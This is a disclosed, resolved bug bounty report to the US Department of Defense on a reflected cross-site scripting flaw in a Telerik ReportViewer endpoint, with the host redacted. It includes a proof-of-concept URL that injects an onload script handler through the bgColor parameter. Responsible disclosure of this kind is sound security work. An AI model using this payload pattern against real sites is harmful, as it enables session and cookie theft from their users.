XSS Reflected - ███

Disclosed: 2022-04-07 19:50:53 By drauschkolb To deptofdefense
Medium
Vulnerability Details
Hi Team, I found a XSS Reflected. ``` https://██████/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) ``` Thans DRauschkolb ## Impact XSS vulnerabilities can be used to trick a web user into executing a malicious script, potentially revealing a user's web session information or modify web content & even steal cookies. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce https://█████/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1223575
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report